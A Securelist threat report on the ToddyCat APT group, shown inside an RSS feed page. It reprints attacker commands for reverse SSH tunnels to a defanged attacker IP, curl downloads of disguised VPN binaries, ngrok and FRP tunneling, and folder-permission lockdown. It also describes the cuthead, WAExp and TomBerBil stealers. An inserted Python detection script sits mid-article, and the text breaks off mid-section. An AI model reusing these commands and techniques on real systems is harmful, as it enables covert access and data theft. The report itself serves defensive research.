[Valid RSS] This is a valid RSS feed.


This feed is valid, but interoperability with the widest range of feed readers could be improved by implementing the following recommendations.


<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
xmlns:content=""
xmlns:wfw=""
xmlns:dc=""
xmlns:atom=""
xmlns:sy=""
xmlns:slash=""
>
<channel>
<title>Securelist</title>
<atom:link href="" rel="self" type="application/rss+xml" />
<link></link>
<description></description>
<lastBuildDate>Mon, 22 Apr 2024 10:36:52 +0000</lastBuildDate>
<language>en-US</language>
<sy:updatePeriod>hourly</sy:updatePeriod>
<sy:updateFrequency>1</sy:updateFrequency>
<generator></generator>
<image>
<url></url>
<title>Securelist</title>
<link></link>
<width>32</width>
<height>32</height>
</image>
<item>
<title>ToddyCat is making holes in your infrastructure</title>
<link></link>
<comments></comments>
<dc:creator><![CDATA[Andrey Gunkin, Alexander Fedotov, Natalya Shornikova]]></dc:creator>
<pubDate>Mon, 22 Apr 2024 10:00:00 +0000</pubDate>
<category><![CDATA[APT reports]]></category>
<category><![CDATA[APT]]></category>
<category><![CDATA[Cyber espionage]]></category>
<category><![CDATA[Data theft]]></category>
<category><![CDATA[SSH]]></category>
<category><![CDATA[Targeted attacks]]></category>
<category><![CDATA[ToddyCat]]></category>
<category><![CDATA[VPN]]></category>
<category><![CDATA[WhatsApp]]></category>
<category><![CDATA[APT (Targeted attacks)]]></category>
<guid isPermaLink="false"></guid>
<description><![CDATA[We continue to report on the APT group ToddyCat. This time, we’ll talk about traffic tunneling, constant access to a target infrastructure and data extraction from hosts.]]></description>
<content:encoded><![CDATA[<p><img width="990" height="400" src="" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>We continue covering the activities of the APT group <a href="" target="_blank" rel="noopener"><strong>ToddyCat</strong></a>. In our <a href="" target="_blank" rel="noopener">previous article</a>, we described tools for collecting and exfiltrating files (<strong>LoFiSe</strong> and <strong>PcExter</strong>). This time, we have investigated how attackers obtain constant access to compromised infrastructure, what information on the hosts they are interested in, and what tools they use to extract it.</p>
<p><strong>ToddyCat </strong>is an <a href="" target="_blank" rel="noopener">APT</a> group that predominantly targets governmental organizations, some of them defense related, located in the Asia-Pacific region. One of the group&#8217;s main goals is to steal sensitive information from hosts.</p>
<p>During the observation period, we noted that this group stole data on an industrial scale. To collect large volumes of data from many hosts, attackers need to automate the data harvesting process as much as possible, and provide several alternative means to continuously access and monitor systems they attack. We decided to investigate how this was implemented by ToddyCat. Note that all tools described in this article are applied at the stage where the attackers have compromised high-privileged user credentials allowing them to connect to remote hosts. In most cases, the adversary connected, transferred and ran all required tools with the help of <a href="" target="_blank" rel="noopener">PsExec</a> or <a href="" target="_blank" rel="noopener">Impacket</a>.</p>
<h2 id="tools-for-traffic-tunneling">Tools for traffic tunneling</h2>
<p>Having several tunnels into the infected infrastructure, implemented with different tools, allows attackers to maintain access to systems even if one of the tunnels is discovered and eliminated. By securing constant access to the infrastructure, attackers are able to perform reconnaissance and connect to remote hosts.</p>
<h3 id="reverse-ssh-tunnel">Reverse SSH Tunnel</h3>
<p>One way to gain access to remote network services is to create a reverse SSH tunnel.</p>
<p>Attackers use several files to launch a reverse SSH tunnel:</p>
<ol>
<li>The SSH client from the OpenSSH for Windows toolkit, along with the library required for running it</li>
<li>An OPENSSH private key file</li>
<li>The &#8220;<strong>a.bat</strong>&#8221; script to hide the private key file</li>
</ol>
<p>The attackers transferred all files to the target host via <strong>SMB </strong>with the help of shared folders <strong>(<a href="">T1021.002: </a><a href="" target="_blank" rel="noopener">Remote Services: SMB/Windows Admin Shares</a>)</strong>.</p>
<p>The attackers did not attempt to hide the presence of the SSH client file in the system. The file retained its original name and was placed inside folders whose names indicated the presence of an SSH client in the system.</p><pre class="crayon-plain-tag">C:\program files\OpenSSH\ssh.exe
C:\programdata\sshd\ssh.exe
C:\programdata\ssh\ssh.exe</pre><p>
The private key files required for establishing a connection to the remote server were copied to the following paths.</p><pre class="crayon-plain-tag">C:\Windows\AppReadiness\read.ini
C:\Windows\AppReadiness\data.dat
C:\Windows\AppReadiness\log.dat
C:\Windows\AppReadiness\value.dat</pre><p>
<strong>OpenSSH </strong>private key files are normally created without extensions, but they can be given the extension .key or similar. In the example, the attackers used .ini and .dat extensions for private key files, obviously to hide their true purpose. Files like that look less suspicious in the command-line interface than .key files or files without an extension.</p>
<p>After the private key files have been copied to the <strong>AppReadiness </strong>folder, the adversary copies and runs an <strong>a.bat</strong> script. In the attacked systems, it was found mostly in temporary directories or in users&#8217; shared folders.</p><pre class="crayon-plain-tag">c:\users\public\a.bat</pre><p>
This file contains the following commands.</p><pre class="crayon-plain-tag">@echo off
::# Set Key File Variable:
Set Key="C:\Windows\AppReadiness"
takeown /f "%Key%"
icacls "%Key%" /remove "BUILTIN\Administrators" &gt; "%temp%\a.txt"
icacls "%Key%" /remove "Administrators" &gt;&gt; "%temp%\a.txt"
icacls "%Key%" /remove "NT AUTHORITY\Authenticated Users" &gt;&gt; "%temp%\a.txt"
icacls "%Key%" /remove "CREATOR OWNER" &gt;&gt; "%temp%\a.txt"
icacls "%Key%" /remove "BUILTIN\Users" &gt;&gt; "%temp%\a.txt"
icacls "%Key%" /remove "Users" &gt;&gt; "%temp%\a.txt"
icacls "%Key%" &gt;&gt; "%temp%\a.txt"
::# Remove Variable:
set "Key="</pre><p>
In Windows,<strong> C:\Windows\AppReadiness</strong> is part of the AppReadiness service and stores application files for initial configuration when applications are first launched or when a user logs on for the first time.</p>
<div id="attachment_112447" style="width: 813px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img fetchpriority="high" decoding="async" aria-describedby="caption-attachment-112447" class="size-full wp-image-112447" src="" alt="The icacls command output for the AppReadiness folder with default values" width="803" height="167" /></a><p id="caption-attachment-112447" class="wp-caption-text">The icacls command output for the AppReadiness folder with default values</p></div>
<p>The image above shows the default permissions for this folder:</p>
<ul>
<li>Administrators and system: full permissions</li>
<li>Authorized users: read-only permissions</li>
</ul>
<p>This means that regular users can view the contents of the folder.</p>
<p>The <strong>a.bat</strong> script sets the system as the owner of the folder and removes all other users from its discretionary access control list (DACL). The image below shows the DACL for <strong>C:\Windows\AppReadiness</strong> after the script has run:</p>
<div id="attachment_112448" style="width: 803px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img decoding="async" aria-describedby="caption-attachment-112448" class="size-full wp-image-112448" src="" alt="The icacls command output for the AppReadiness folder after a.bat script has executed" width="793" height="101" /></a><p id="caption-attachment-112448" class="wp-caption-text">The icacls command output for the AppReadiness folder after a.bat script has executed</p></div>
<p>Once the permissions have been changed, neither normal users nor administrators will be able to access this folder. Attempting to open it will cause a &#8220;no permission&#8221; error.</p>
<div id="attachment_112449" style="width: 746px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img decoding="async" aria-describedby="caption-attachment-112449" class="size-full wp-image-112449" src="" alt="Access denied error and Security tab for the AppReadiness folder" width="736" height="496" /></a><p id="caption-attachment-112449" class="wp-caption-text">Access denied error and Security tab for the AppReadiness folder</p></div>
<p>To start the tunnel, attackers create a scheduled task that runs the following command.</p><pre class="crayon-plain-tag">C:\PROGRA~1\OpenSSH\ssh.exe -i C:\Windows\AppReadiness\value.dat -o
StrictHostKeyChecking=accept-new -R 31481:localhost:53
systemtest01@103[.]27.202.85 -p 22222 -fN</pre><p>
This command creates an SSH connection to a remote server with the IP address <strong>103[.]27.202.85</strong> on port <strong>22222 </strong>as the user named <strong>systemtestXX</strong>, where <strong>XX</strong> is a number. This connection will redirect network traffic from a certain port on the server to a certain port on the infected host. This is needed to provide the malicious server with constant access to the services running on the target host and listening on the specified port.</p>
<p>In the example above, the user <strong>systemtest01</strong> establishes a connection that redirects traffic from port <strong>31481 </strong>on the server to port <strong>53</strong> on the target host. A connection like this created on domain controllers allows attackers to obtain the IP addresses of hosts on the internal network through DNS queries.</p>
<p>Each user is assigned to a different port on the infected host. For example, the user <strong>systemtest05 </strong>redirects traffic from the malicious server to port <strong>445</strong>, normally used by SMB services.</p>
<p>The remote server IP information is shown in the table below.</p>
<table width="100%">
<tbody>
<tr>
<td width="17%"><strong>IP</strong></td>
<td width="16%"><strong>Country + ASN</strong></td>
<td width="16%"><strong>Net name</strong></td>
<td width="17%"><strong>Net Description</strong></td>
<td width="17%"><strong>Address </strong></td>
<td width="17%"><strong>Email </strong></td>
</tr>
<tr>
<td>103.27.202[.]85</td>
<td>Thailand, AS58955</td>
<td>BANGMOD-VPS-NETWORK</td>
<td>Bangmod VPS Network</td>
<td>Bangmod-IDC Supermicro Thailand Powered by CSloxinfo</td>
<td></td>
</tr>
</tbody>
</table>
<p>The whole process of creating an SSH tunnel can be described with the diagram given below.</p>
<div id="attachment_112450" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112450" class="size-large wp-image-112450" src="" alt="Diagram of SSH tunnel creation" width="1024" height="459" /></a><p id="caption-attachment-112450" class="wp-caption-text">Diagram of SSH tunnel creation</p></div>
<h3 id="softether-vpn">SoftEther VPN</h3>
<p>The next tool that the attackers used for tunneling was the server utility (VPN Server) from the SoftEther VPN package.</p>
<p><a href="" target="_blank" rel="noopener">SoftEther VPN</a> is an open-source solution developed as part of academic research at the University of Tsukuba that allows creating VPN connections via many popular protocols, such as L2TP/IPsec, OpenVPN, MS-SSTP, L2TPv3, EtherIP and others.</p>
<p>To launch the VPN server, the attackers used the following files:</p>
<ul>
<li><strong>vpnserver_x64.exe</strong>: a digitally signed VPN server executable</li>
<li><strong>hamcore.se2</strong>: a container file that includes components required to run vpnserver_x64.exe</li>
<li><strong>vpn_server.config</strong>: server configuration</li>
</ul>
<p>In the operating system, the VPN server can run as a service or as an application with a GUI. The mode is set via a command-line parameter.</p>
<p>In virtually every case we observed, the attackers renamed <strong>vpnserver_x64.exe</strong> to hide its purpose in the infected system. The following names of, and paths to, this file are known:</p><pre class="crayon-plain-tag">c:\programdata\ssh\vmtools.exe
c:\programdata\lenovo\lenovo\kln.exe
c:\programdata\iobit\iobitrtt\tmp\mstime.exe
c:\perflogs\ecache\boot.exe
C:\users\public\music\wia.exe
c:\windows\debug\wia\wia.exe
c:\users\public\music\taskllst.exe
c:\programdata\lenovo\lenovo\main.exe
c:\programdata\intel\gcc\gcc\boot.exe
c:\programdata\lenovo\lenovodisplaycontrolcenterservice\netscan.exe
c:\programdata\kasperskylab\kaspersky.exe</pre><p>
You may notice that in some cases, the attackers used the names of security products to conceal the purpose of the file.</p>
<p>The file <strong>hamcore.se2</strong> was not renamed in the attacked systems, as it was loaded by the VPN server by name from the same folder where the VPN server executable was located.</p>
<p>To transfer the tools to victim hosts, the attackers used their standard technique of copying files through shared resources (<strong><a href="" target="_blank" rel="noopener">T1021.002 Remote Services: SMB/Windows Admin Shares</a></strong>), and downloaded files from remote resources using the <strong>curl </strong>utility (see below).</p><pre class="crayon-plain-tag">"cmd.exe" /C curl http://www.netportal.or[.]kr/common/css/main.js -o
c:\windows\debug\wia\wia.exe &gt; C:\WINDOWS\Temp\vwqkspeq.tmp 2&gt;&amp;1
"cmd.exe" /C curl http://www.netportal.or[.]kr/common/css/ham.js -o
c:\windows\debug\wia\hamcore.se2 &gt; C:\WINDOWS\Temp\nohEicOE.tmp 2&gt;&amp;1</pre><p>
We observed the following remote resources being used as download sources.</p>
<table width="100%">
<tbody>
<tr>
<td width="65%"><strong>URL</strong></td>
<td width="35%"><strong>Original file name</strong></td>
</tr>
<tr>
<td>hxxp://www.netportal.or[.]kr/common/css/main.js</td>
<td>vpnserver_x64.exe</td>
</tr>
<tr>
<td>hxxp://www.netportal.or[.]kr/common/css/ham.js</td>
<td>Hamcore.se2</td>
</tr>
<tr>
<td>hxxp://23.106.122[.]5/hamcore.se2</td>
<td>Hamcore.se2</td>
</tr>
<tr>
<td>hxxps://etracking.nso.go[.]th/UserFiles/File/111/tasklist.exe</td>
<td>vpnserver_x64.exe</td>
</tr>
<tr>
<td>hxxps://etracking.nso.go[.]th/UserFiles/File/111/hamcore.se2</td>
<td>Hamcore.se2</td>
</tr>
</tbody>
</table>
<p>In most cases, the configuration file was copied along with the server executable. However, in some cases, it was not copied but created by executing vpnserver_x64.exe with the options <strong>/install</strong> or <strong>/usermode_hidetray</strong>, and then edited.</p><pre class="crayon-plain-tag">"cmd.exe" /C c:\users\public\music\taskllst.exe /install &gt; C:\Windows\Temp\fnOcaiqm.tmp 2&gt;&amp;1
"cmd.exe" /C c:\users\public\music\taskllst.exe /usermode_hidetray &gt; C:\Windows\Temp\TSwkLRsR.tmp</pre><p>
In this case, after installing the server in the system, the attackers changed the server settings in <strong>vpn_server.config</strong>.</p>
<p>Data for connecting the remote client to the server and its authentication details are added to the configuration file:</p>
<table width="100%">
<tbody>
<tr>
<td width="60%"><strong>AccountName</strong></td>
<td width="40%"><strong>Hostname</strong></td>
</tr>
<tr>
<td>ha.bbmouseme[.]com</td>
<td>118[.]193.40.42</td>
</tr>
</tbody>
</table>
<h3 id="ngrok-agent-and-krong">Ngrok agent and Krong</h3>
<p>Another way the attackers accessed the remote infrastructure was by tunneling to a legitimate cloud provider. An application running on the user&#8217;s host with access to the local infrastructure can connect through a legitimate agent to the cloud and redirect traffic or run certain commands.</p>
<p><a href="" target="_blank" rel="noopener">Ngrok</a> is a lightweight agent that can redirect traffic from endpoints to cloud infrastructure and vice versa. The attackers installed ngrok on target hosts and used it to redirect C2 traffic from the cloud infrastructure to a certain port on these hosts.</p>
<p>The agent can be started, for instance, with the following command.</p><pre class="crayon-plain-tag">"cmd" /c "cd C:\windows\temp\ &amp; Intel.exe tcp --region=ap 54112 --
authtoken 2GskqGD&lt;token&gt;txB7WyV"</pre><p>
The port where ngrok redirects C2 traffic is also the port that another tool, Krong, listens on. Krong is a DLL file <a href="" target="_blank" rel="noopener">side-loaded</a> <strong>(<a href="" target="_blank" rel="noopener">T1574.002 Hijack Execution Flow: DLL Side-Loading</a>)</strong> with a legitimate application digitally signed by AVG TuneUp. The tool receives through the command-line interface the address and the port on which to expect a connection.</p><pre class="crayon-plain-tag">"cmd" /c "cd C:\windows\temp\ &amp; SystemInformation.exe 54112"</pre><p>
Krong is a proxy that encrypts the data transmitted through it using the XOR function.</p>
<div id="attachment_112451" style="width: 343px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112451" class="size-full wp-image-112451" src="" alt="Code snippet for deciphering received data" width="333" height="457" /></a><p id="caption-attachment-112451" class="wp-caption-text">Code snippet for deciphering received data</p></div>
<p>This allows Krong to hide the contents of the traffic to evade detection.</p>
<h3 id="frp-client">FRP client</h3>
<p>After creating tunnels on target hosts using OpenSSH or SoftEther VPN, attackers additionally install the <a href="" target="_blank" rel="noopener">FRP client</a>. FRP is a fast reverse proxy written in Go that allows access from the Internet to a local server located behind a NAT or firewall. FRP has a web interface for changing settings and viewing connection statistics.</p>
<p>The attackers used two files to run the client:</p>
<ul>
<li><strong>Frpc.exe</strong>: an FRP client executable file</li>
<li><strong>Frpc.toml</strong>: a client configuration file</li>
</ul>
<p>The files are given arbitrary names. Also, the configuration file extension is changed from the standard .toml to .ini, as is the case with OpenSSH private key files.</p>
<p>After copying the files to the target host, the attackers create a service with an arbitrary name, which is started via the following command.</p><pre class="crayon-plain-tag">c:\windows\debug\tck.exe -c c:\windows\debug\tc.ini</pre><p>
This starts the FRP client with the configuration file &#8220;tc.ini&#8221;. The traffic is then routed from C2 through this tool.</p>
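<p>As an added defender's example (not code from the article or from Kaspersky), the following Python sketch turns the command lines shown in the four tunneling sections above (the reverse SSH tunnel with its disguised key and the a.bat DACL change, the SoftEther server staged via curl and renamed, the ngrok agent, and the FRP client with a .ini config) into command-line detection rules and runs them over constructed process-creation events. The regular expressions, host names, addresses and the token are assumptions to tune against your own telemetry, not indicators from the report.</p>

```python
"""Command-line detections for the tunneling tradecraft described above.

Added example (not from the article): each Rule is a case-insensitive regex
over a process command line, e.g. the CommandLine field of a Sysmon event ID 1
or Windows 4688 record.  All events below are constructed; hosts, addresses
and the token are placeholders, not indicators from the report.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    why: str          # what the article says this pattern corresponds to
    pattern: re.Pattern


RULES: tuple[Rule, ...] = (
    # ssh.exe opening a reverse tunnel (-R) with a key file renamed to .ini/.dat
    Rule("reverse-ssh-tunnel-disguised-key",
         "OpenSSH client with -R and a private key carrying a .ini/.dat extension",
         re.compile(r"ssh\.exe.*\s-i\s+\S+\.(?:ini|dat)\b.*\s-R\s+\d+:", re.I)),
    # a.bat strips the built-in groups from the AppReadiness DACL; cmd expands
    # %Key% before spawning icacls, so the logged command line shows the path
    Rule("appreadiness-dacl-lockdown",
         "icacls /remove against C:\\Windows\\AppReadiness",
         re.compile(r'icacls\s+"?\S*\\appreadiness"?\s+/remove\b', re.I)),
    # SoftEther staging: curl pulls a ".js" URL straight into an .exe or hamcore.se2
    Rule("curl-js-url-to-executable",
         "curl downloading a .js URL to an .exe/.se2 path",
         re.compile(r"\bcurl\s+\S+\.js\s+-o\s+\S+\.(?:exe|se2)\b", re.I)),
    # vpnserver options run from a binary that is not named vpnserver_x64.exe;
    # "/install" alone is noisy, so treat this as a lead to corroborate
    Rule("softether-renamed-server",
         "/install or /usermode_hidetray from a renamed SoftEther server binary",
         re.compile(r"(?<!vpnserver_x64)\.exe\s+/(?:install|usermode_hidetray)\b", re.I)),
    # ngrok-style agent exposing a local TCP port with an inline auth token
    Rule("ngrok-tcp-authtoken",
         "tcp tunnel to a cloud relay with --authtoken on the command line",
         re.compile(r"\btcp\s+(?:--region=\S+\s+)?\d+\s+--authtoken\s+\S+", re.I)),
    # FRP client whose TOML config was renamed to .ini
    Rule("frp-client-ini-config",
         "client started with -c <file>.ini",
         re.compile(r'\S+\.exe"?\s+-c\s+\S+\.ini\b', re.I)),
)


def scan_command_line(cmdline: str) -> list[str]:
    """Return the names of all rules matching one command line."""
    return [rule.name for rule in RULES if rule.pattern.search(cmdline)]


def scan_events(events: list[tuple[str, str]]) -> list[tuple[str, str, str]]:
    """Run every rule over (host, cmdline) pairs; return (host, rule, cmdline) hits."""
    return [(host, name, cmd)
            for host, cmd in events
            for name in scan_command_line(cmd)]


# Constructed sample telemetry: six events modelled on the article's commands
# (with placeholder addresses) plus two benign ones that must not fire.
SAMPLE_EVENTS = [
    ("dc01", r"C:\PROGRA~1\OpenSSH\ssh.exe -i C:\Windows\AppReadiness\value.dat "
             r"-o StrictHostKeyChecking=accept-new -R 31481:localhost:53 "
             r"systemtest01@203.0.113.10 -p 22222 -fN"),
    ("dc01", r'icacls "C:\Windows\AppReadiness" /remove "BUILTIN\Administrators"'),
    ("ws07", r'"cmd.exe" /C curl http://example.invalid/common/css/main.js -o c:\windows\debug\wia\wia.exe'),
    ("ws07", r'"cmd.exe" /C c:\users\public\music\taskllst.exe /usermode_hidetray'),
    ("ws09", r'"cmd" /c "cd C:\windows\temp\ & Intel.exe tcp --region=ap 54112 --authtoken PLACEHOLDER"'),
    ("ws09", r"c:\windows\debug\tck.exe -c c:\windows\debug\tc.ini"),
    ("ws11", r"C:\Program Files\OpenSSH\ssh.exe -i C:\Users\alice\.ssh\id_ed25519 alice@jumphost.example"),
    ("ws11", r"curl https://example.invalid/report.pdf -o C:\Users\alice\Downloads\report.pdf"),
]

if __name__ == "__main__":
    for host, name, cmd in scan_events(SAMPLE_EVENTS):
        print(f"{host}: {name}: {cmd}")
```

Each of the six modelled events fires exactly one rule and the two benign ssh/curl invocations fire none; the a.bat rule keys on the expanded path because cmd substitutes the %Key% variable before icacls is spawned.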
<h2 id="data-collection-tools">Data collection tools</h2>
<h3 id="cuthead-for-data-collection">Cuthead for data collection</h3>
<p>Recently, ToddyCat started using a new tool we named <strong>cuthead </strong>to search for documents. The name originated from the &#8220;file description&#8221; field of the sample we found. It is a .NET compiled executable designed to search for files and store those it finds inside an archive. The tool can search for specified file extensions or words in the file name.</p>
<p>Cuthead tool accepts the following arguments:</p><pre class="crayon-plain-tag">fkw.exe &lt;date&gt; &lt;extensions&gt; [keywords]</pre><p>
<ul>
<li><strong>Date:</strong> the date when the file was last modified, in <strong>yyyyMMdd</strong> format. The search looks for files modified on that date or later</li>
<li><strong>Extensions</strong>: a string without spaces that contains file extensions separated by semicolons</li>
<li><strong>Keywords</strong>: a string without spaces that contains semicolon-delimited words to look for in file names</li>
</ul>
<p>Here is an example of a <strong>cuthead</strong> launch command.</p><pre class="crayon-plain-tag">"c:\intel\fkw.exe" 20230626 pdf;doc;docx;xls;xlsx</pre><p>
In this case, the attackers collected all MS Excel, MS Word and PDF files modified after June 26, 2023.</p>
<p>Once launched, the tool processes the command-line parameters and begins a recursive search for files in the file system on all available drives (<strong><a href="" target="_blank" rel="noopener">T1005 Data from Local System</a></strong>). Folders that contain the following substrings are excluded from the search.</p><pre class="crayon-plain-tag">$
Windows
Program Files
Programdata
Application Data
Program Files (x86)
Documents and Settings</pre><p>
Also, the files are excluded from the search if they meet the following criteria:</p>
<ul>
<li>The file size is greater than 50 MB (52428800 bytes).</li>
<li>The file extensions do not match those specified in the command-line parameters.</li>
<li>The names do not contain the keywords specified in the command-line parameters.</li>
</ul>
<p>A list of files found by the search is passed to the function that creates ZIP archives with the password &#8220;Unsafe404&#8221;. In different versions of the tool, this function has different names but the same purpose. The open-source tool <a href="" target="_blank" rel="noopener">icsharpcode/SharpZipLib</a> v. is used for creating archives (<strong><a href="" target="_blank" rel="noopener">T1560.002 Archive Collected Data: Archive via Library</a></strong>).</p>
<p>Several later variants of cuthead were found with all required options – a list of file extensions and a last modified date that was typically within the previous 7 days – hardcoded within the software. We believe this was done to automate the collection process.</p>
  246. <h3 id="waexp-whatsapp-data-stealer">WAExp: WhatsApp data stealer</h3>
  247. <p>This tool is written in .NET and designed to search for and collect browser local storage files containing data from the web version of WhatsApp ( For users of the WhatsApp web app, their browser local storage contains their profile details, chat data, the phone numbers of users they chat with and current session data. Attackers can gain access to this data by copying the browser&#8217;s local storage files.</p>
  248. <p>The executable accepts the following arguments.</p><pre class="crayon-plain-tag">app.exe [check|copy|start] [remote]</pre><p>
  249. <strong>Check</strong>: checks the presence of data on the host.<br />
  250. <strong>Copy</strong>: copies data it finds to the temporary folder.<br />
  251. <strong>Start:</strong> first, copies the data to the temporary folder and then, packs the data into an archive file.<br />
  252. <strong>Remote</strong>: the name of the remote host.</p>
  253. <p>When executed with &#8220;<strong>check</strong>&#8220;, the tool begins searching for user folders. If &#8220;<strong>remote</strong>&#8221; is specified, user folders are searched along &#8220;<strong>\\[remote]\C$\users\</strong>&#8220;. If it is not specified, the malware uses the environment variable <strong>%SystemDrive%</strong> value, retrieving the name of the system drive from it. It then searches inside the Users folder on that drive. Next, the tool goes through all folders in this directory except the following default ones.</p><pre class="crayon-plain-tag">All Users
  254. Default User
  255. Default
  256. Public</pre><p>
  257. After it locates the user folders, WAExp seeks out file paths for WhatsApp database files in the Chrome, Edge, and Mozilla local storages.</p>
  258. <p>ForChrome, the tool opens <strong>&lt;User&gt;\Appdata\local\Google\</strong> and for Edge, <strong>&lt;User&gt;\Appdata\local\Microsoft\Edge\</strong>. Inside these, it looks for a folder with the following name inside the subfolders.</p><pre class="crayon-plain-tag">https_web.whatsapp.com_0.indexeddb.leveldb</pre><p>
  259. For Mozilla, the tool opens<strong>&lt;User&gt;\Appdata\roaming\</strong> and looks for a folder with the following name inside the subfolders:</p><pre class="crayon-plain-tag"></pre><p>
  260. Roaming may contain several Mozilla folders with storage data. For example,Mozilla Thunderbird can store this data too, as it supports a WhatsApp plugin.</p>
  261. <div id="attachment_112452" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112452" class="size-large wp-image-112452" src="" width="1024" height="262" srcset=" 1024w, 300w, 768w, 740w, 1096w, 800w, 1131w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112452" class="wp-caption-text">WAExp &#8220;check&#8221; output with results for Chrome, Edge, Firefox and Thunderbird</p></div>
  262. <p>In the image above, you can see the output of the tool running with the &#8220;<strong>check</strong>&#8221; parameter. It shows storage files for <strong>Chrome</strong>, <strong>Edge</strong> and <strong>Firefox</strong>, as well as the <strong>Thunderbird</strong> mail client detected on the host.</p>
  263. <p>When executed with the &#8220;<strong>copy</strong>&#8221; parameter, WAExp copies all data storage files in the system to the following temporary storage folder.</p><pre class="crayon-plain-tag">C:\Programdata\Microsoft\Default\</pre><p>
  264. The last parameter that the tool uses is <strong>&#8220;start&#8221;</strong>. It gathers target files inside a temporary folder, as described in the <strong>copy</strong> function, and packs these into an archive with the help of the <strong>System.IO.Compression.ZipFile</strong> module (<strong><a href="" target="_blank" rel="noopener">T1560.002 Archive Collected Data: Archive via Library</a></strong>).</p>
  265. <p>It saves the archive file under a name consisting of the word &#8216;Default&#8217; and a timestamp, without extension, at the following path:</p><pre class="crayon-plain-tag">C:\Programdata\Microsoft\Default-yyyyMMdd-hhmmss</pre><p>
  266. After that, it deletes the temporary folder, along with the web browsers&#8217; and other clients&#8217; folders containing <strong></strong> data.</p>
  267. <p>The image below shows an example of WAExp output when run with the various startup parameters.</p>
  268. <div id="attachment_112453" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112453" class="size-large wp-image-112453" src="" alt="WAExp output for its various command-line parameters" width="1024" height="510" srcset=" 1024w, 300w, 768w, 703w, 740w, 563w, 800w, 1069w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112453" class="wp-caption-text">WAExp output for its various command-line parameters</p></div>
  269. <p>The operations shown above collect <strong>Chrome</strong> data and generate an archive, whose contents are shown below.</p>
  270. <div id="attachment_112454" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112454" class="size-large wp-image-112454" src="" alt="Archive file containing data stolen by WAExp" width="1024" height="398" srcset=" 1024w, 300w, 768w, 900w, 740w, 720w, 800w, 1046w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112454" class="wp-caption-text">Archive file containing data stolen by WAExp</p></div>
  271. <h3 id="tomberbil-for-stealing-passwords-from-browsers">TomBerBil for stealing passwords from browsers</h3>
  272. <p>In addition to the data that attackers can collect from hosts, they are also interested in obtaining access to all online services that target users have access to. For an adversary with high privileges in the system, one fairly easy way to do this is to decrypt browser data containing cookies and passwords that the user may have saved to autofill authentication forms (<strong><a href="" target="_blank" rel="noopener">T1555.003 Credentials from Password Stores: Credentials from Web Browsers</a></strong>).</p>
  273. <p>There are many open-source tools available for decrypting storage data, one of these being <a href="" target="_blank" rel="noopener"><strong>mimikatz</strong></a>. The problem for the adversary is that these are well known to security systems and will immediately raise red flags if detected in the infrastructure.</p>
  274. <p>To avoid detection, attackers have created a range of tools implemented with different technologies and designed for the same purpose: to extract cookies and passwords from <strong>Chrome </strong>and <strong>Edge</strong>. Both browsers use the <a href="" target="_blank" rel="noopener"><strong>CryptProtectData</strong></a> feature from <strong>DPAPI </strong>(Data Protection Application Programming Interface) to encrypt data. It protects data with the current user&#8217;s password and a special encryption master key.</p>
  275. <p>All <strong>TomBerBil </strong>variants work according to the same principle. After starting, the malware begins to enumerate all processes running in the system and search for all instances of <strong>explorer.exe</strong>. It identifies the process users and compiles a list.</p>
  276. <div id="attachment_112455" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112455" class="size-large wp-image-112455" src="" alt="Username identification function" width="1024" height="302" srcset=" 1024w, 300w, 768w, 740w, 949w, 800w, 1095w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112455" class="wp-caption-text">Username identification function</p></div>
  277. <p>The image above shows an example of the function that identifies users by process ID. It sends a <strong>WMI </strong>request to the <strong>Win32_Process </strong>class to receive an object whose <strong>processID property </strong>equals the given PID. It then calls the <strong>GetOwner </strong>method, which returns the user and domain name for the process.</p>
  278. <p>After this, the malware searches for the encryption key, stored in the <strong>encrypted_key </strong>field in the following browser <strong>JSON </strong>files.</p><pre class="crayon-plain-tag">%LOCALAPPDATA%\Google\Chrome\User Data\Local State
  279. %LOCALAPPDATA%\Microsoft\Edge\User Data\Local State</pre><p>
280. It then impersonates the users it identified and attempts to decrypt the master key using the <strong>CryptUnprotectData</strong> function. To do this, it calls the <strong>Unprotect</strong> function from the <strong>System.Security.Cryptography.ProtectedData</strong> package, which, in turn, uses the <strong>CryptUnprotectData</strong> function from Windows DPAPI.</p>
  281. <div id="attachment_112456" style="width: 622px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112456" class="size-full wp-image-112456" src="" alt="Calling the Unprotect function" width="612" height="76" srcset=" 612w, 300w" sizes="(max-width: 612px) 100vw, 612px" /></a><p id="caption-attachment-112456" class="wp-caption-text">Calling the Unprotect function</p></div>
  282. <p>The image above shows an example of the <strong>Unprotect</strong> function call, which receives an array of bytes obtained from the <strong>encrypted_key</strong> field. The value of <strong>DataProtectionScope.CurrentUser</strong> is passed as the third parameter. This means that the user context of the calling process will be used when decrypting the data. The tool impersonates the users it finds in explorer.exe for this very purpose.</p>
  283. <p>If the decryption is successful, the malware searches for <strong>Login Data</strong> and <strong>\Network\Cookies</strong> files inside the following folders.</p><pre class="crayon-plain-tag">%LOCALAPPDATA%\Google\Chrome\User Data\Default
  284. %LOCALAPPDATA%\Google\Chrome\User Data\Profile *</pre><p>
